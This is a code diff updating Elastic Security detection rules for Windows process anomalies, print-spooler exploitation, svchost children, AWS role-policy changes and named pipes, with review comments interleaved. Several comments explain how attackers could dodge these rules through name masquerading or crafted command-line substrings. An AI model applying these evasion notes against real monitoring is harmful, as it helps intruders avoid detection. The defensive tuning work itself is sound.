proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not 
process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": 
"medium", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json index 0218eda10e75f..a2307f479190f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json 
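Review bot: Every relationship in the `query` is keyed on `process.parent.name` and `process.name` alone, so a parent-name masquerade (a binary named `services.exe` or `svchost.exe` started from a user-writable directory) satisfies the expected-parent branches and its children are never flagged; this is inherent to name-based baselining but is worth stating in the note's "False positive analysis"/limitations so analysts do not over-trust a non-alert. For the highest-value children it would be cheap to anchor the parent to its path using the parent counterpart of the `process.executable` field the other rules in this change use, e.g. `(process.name:"lsass.exe" and not process.parent.executable:"?:\\Windows\\System32\\wininit.exe")`, assuming the data source populates it. Minor style point: the note writes `Get-FileHash` without backticks while the sibling triage guides use `` `Get-FileHash` ``.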
@@ -15,13 +15,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Print Spooler Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\")\n", "references": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 47, 
"rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json index 9757765bf4af0..c7112077bc0e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json 
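Review bot: The FP exclusion `not (process.name : ("cmd.exe", "powershell.exe") and process.command_line : ("*.spl*", "*\\program files*", "*route add*"))` is a bare substring match, so a SYSTEM-level cmd/powershell child of spoolsv.exe — exactly the CVE-2021-34527 post-exploitation shape this rule references — is suppressed as soon as the attacker includes `\program files` or `.spl` anywhere in the command line. Consider replacing the substring patterns with the specific legitimate invocations observed during tuning, or at least requiring the path to be a whole argument, e.g. `process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")`, and add a query comment naming which printer-driver workflow each exclusion covers. Separately, `required_fields` lists `process.Ext.token.integrity_level_name` with `"type": "unknown"` and marks both integrity fields as required even though the query makes them optional with `?` and only needs one of them; if this list is generated it is fine, otherwise the `ecs: false` entries deserve a real type or an explanatory note in `setup`.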
@@ -15,10 +15,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Service Host Child Process - Childless Service", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n\n process.parent.args : (\"WdiSystemHost\",\"LicenseManager\",\n \"StorSvc\",\"CDPSvc\",\"cdbhsvc\",\"BthAvctpSvc\",\"SstpSvc\",\"WdiServiceHost\",\n \"imgsvc\",\"TrkWks\",\"WpnService\",\"IKEEXT\",\"PolicyAgent\",\"CryptSvc\",\n \"netprofm\",\"ProfSvc\",\"StateRepository\",\"camsvc\",\"LanmanWorkstation\",\n \"NlaSvc\",\"EventLog\",\"hidserv\",\"DisplayEnhancementService\",\"ShellHWDetection\",\n \"AppHostSvc\",\"fhsvc\",\"CscService\",\"PushToInstall\") and\n\n /* unknown FPs can be added here */\n\n not process.name : (\"WerFault.exe\",\"WerFaultSecure.exe\",\"wermgr.exe\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n\n process.parent.args : (\"WdiSystemHost\",\"LicenseManager\",\n \"StorSvc\",\"CDPSvc\",\"cdbhsvc\",\"BthAvctpSvc\",\"SstpSvc\",\"WdiServiceHost\",\n \"imgsvc\",\"TrkWks\",\"WpnService\",\"IKEEXT\",\"PolicyAgent\",\"CryptSvc\",\n \"netprofm\",\"ProfSvc\",\"StateRepository\",\"camsvc\",\"LanmanWorkstation\",\n \"NlaSvc\",\"EventLog\",\"hidserv\",\"DisplayEnhancementService\",\"ShellHWDetection\",\n \"AppHostSvc\",\"fhsvc\",\"CscService\",\"PushToInstall\") and\n\n /* unknown FPs can be 
added here */\n\n not process.name : (\"WerFault.exe\",\"WerFaultSecure.exe\",\"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and process.parent.args : \"WdiServiceHost\") and\n not (process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_i4x50\\\\lib\\\\lexexe.exe\") and\n process.parent.args : \"imgsvc\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,5 +102,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json index e46e59feea6f0..89e2918d3f61d 100644 
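Review bot: The new exclusion `not (process.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "...lexexe.exe") and process.parent.args : "imgsvc")` suppresses every executable under either Program Files tree whenever the parent is the `imgsvc` service host, which is much broader than the other two exclusions added in the same query (`RelPost.exe` and the `winethc.dll` rundll32 case), each of which pins a full path. Anything that can place or run a binary under those directories would fall into the exclusion, so consider narrowing it to the vendor subdirectories that were actually observed as false positives, the way the Kodak path already is. The `required_fields` list does cover every field the updated query references (`event.type`, `process.args`, `process.executable`, `process.name`, `process.parent.args`, `process.parent.name`), so no change is needed there.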
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json 
@@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Assume Role Policy Update", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Assume Role Policy Update\n\nAn IAM role is an IAM identity that you can create in your account that has specific permissions. An IAM role is similar\nto an IAM user, in that it is an AWS identity with permission policies that determine what the identity can and cannot\ndo in AWS. However, instead of being uniquely associated with one person, a role is intended to be assumable by anyone\nwho needs it. Also, a role does not have standard long-term credentials such as a password or access keys associated\nwith it. Instead, when you assume a role, it provides you with temporary security credentials for your role session.\n\nThe role trust policy is a JSON document in which you define the principals you trust to assume the role. This policy is\na required resource-based policy that is attached to a role in IAM. An attacker may attempt to modify this policy by\nusing the `UpdateAssumeRolePolicy` API action to gain the privileges of that role.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. 
Tuning is needed in order to have higher\nconfidence. Consider adding exceptions \u2014 preferably with a combination of the user agent and user ID conditions \u2014 to\ncover administrator activities and infrastructure as code tooling.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Use AWS [policy versioning](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-versioning.html) to restore the trust policy to the desired state.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:UpdateAssumeRolePolicy and event.outcome:success\n", "references": [ "https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in-aws" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a60326d7-dca7-4fb7-93eb-1ca03a1febbd", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json index 25de7b35a68ec..ef8c4529ea560 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_via_rogue_named_pipe.json 
@@ -11,15 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Rogue Named Pipe Impersonation", - "note": "## Config\n\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n\n", + "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "file where event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", "references": [ "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", "https://github.com/zcgonvh/EfsPotato", "https://twitter.com/SBousseaden/status/1429530155291193354" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", + "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, 
events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json index 469b1a4e9096f..aa0df3481e30d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_windows_service_via_unusual_client.json 
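Review bot: The added `setup` value contains `condition equal "contains" and keyword equal "pipe"` with unescaped double quotes, whereas the retained `note` directly above escapes the same fragment as `\"contains\"` and `\"pipe\"`; unless this is an artifact of how the diff was rendered, the file is no longer valid JSON and the prepackaged-rule bundle will fail to load. The line should read `` `condition equal \"contains\" and keyword equal \"pipe\"` `` inside the `setup` string. Separately, this rule now carries the identical paragraph in both `note` and `setup`, while every other rule in this change empties `note` when it moves the text to `setup`; one of the two copies should go.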
@@ -11,15 +11,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Windows Service Installed via an Unusual Client", - "note": "## Config\n\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nSystem > \nAudit Security System Extension (Success)\n```\n", + "note": "", "query": "event.action:\"service-installed\" and (winlog.event_data.ClientProcessId:\"0\" or winlog.event_data.ParentProcessId:\"0\")\n", "references": [ "https://www.x86matthew.com/view_post?id=create_svc_rpc", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0100_windows_audit_security_system_extension.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ParentProcessId", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", + "setup": "The 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```", "severity": "high", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json index 90288b6127aff..66484b861c66b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_compiler_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/resource_development_ml_linux_anomalous_compiler_activity.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Resource Development" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0042", + "name": "Resource Development", + "reference": "https://attack.mitre.org/tactics/TA0042/" + }, + "technique": [ + { + "id": "T1588", + "name": "Obtain Capabilities", + "reference": "https://attack.mitre.org/techniques/T1588/", + "subtechnique": [ + { + "id": "T1588.001", + "name": "Malware", + "reference": "https://attack.mitre.org/techniques/T1588/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json index a4d5c9b315e0d..174ee2548a178 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_filebeat8x.json @@ -21,6 +21,38 @@ "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], "risk_score": 99, "rule_id": "699e9fdb-b77c-4c01-995c-1c15019b9c43", "severity": "critical", @@ -194,5 +226,5 @@ "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json index 2612a8139e30e..410f2731d79ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/threat_intel_fleet_integrations.json 
@@ -21,6 +21,38 @@ "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "file.hash.*", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "url.full", + "type": "wildcard" + } + ], "risk_score": 99, "rule_id": "0c9a14d9-d65d-486f-9b5b-91e4e6b22bd0", "severity": "critical", @@ -194,5 +226,5 @@ "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts index ebdf002986ffb..6c7d5d581ce61 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/__mocks__/es_results.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { SignalSourceHit, SignalSearchResponse, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts index dd51f7aaef25d..9e285c36f5138 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.test.ts 
@@ -77,6 +77,7 @@ describe('threshold_executor', () => { runtimeMappings: {}, inputIndex: ['auditbeat-*'], primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(response.warningMessages.length).toEqual(1); }); @@ -131,6 +132,7 @@ describe('threshold_executor', () => { runtimeMappings: {}, inputIndex: ['auditbeat-*'], primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(response.state).toEqual({ initialized: true, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts index b5bf0cdc337a3..39d6ad3f781ed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/executors/threshold.ts @@ -52,6 +52,7 @@ export const thresholdExecutor = async ({ ruleDataReader, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }: { inputIndex: string[]; runtimeMappings: estypes.MappingRuntimeFields | undefined; @@ -68,6 +69,7 @@ export const thresholdExecutor = async ({ ruleDataReader: IRuleDataReader; primaryTimestamp: string; secondaryTimestamp?: string; + aggregatableTimestampField: string; }): Promise => { let result = createSearchAfterReturnType(); const ruleParams = completeRule.ruleParams; @@ -107,7 +109,7 @@ export const thresholdExecutor = async ({ // Eliminate dupes const bucketFilters = await getThresholdBucketFilters({ signalHistory, - primaryTimestamp, + aggregatableTimestampField, }); // Combine dupe filter with other filters @@ -135,6 +137,7 @@ export const thresholdExecutor = async ({ runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }); // Build and index new alerts 
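Review bot: The new required parameter `aggregatableTimestampField: string` on `thresholdExecutor` is added next to `primaryTimestamp` and `secondaryTimestamp` with nothing explaining how it differs from them, even though it now replaces `primaryTimestamp` in the `getThresholdBucketFilters` call and is also forwarded to the search; a one-line comment on the type member would save the next reader a trip through the aggregation code, e.g. `/** timestamp field used for the threshold aggregations and dedupe bucket filters; may differ from primaryTimestamp when that field is not aggregatable */`. Both updated tests in `threshold.test.ts` pass `TIMESTAMP` for `primaryTimestamp` and `aggregatableTimestampField` alike, so the case where the two differ is not exercised. The body of `thresholdExecutor` continues outside the hunk.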
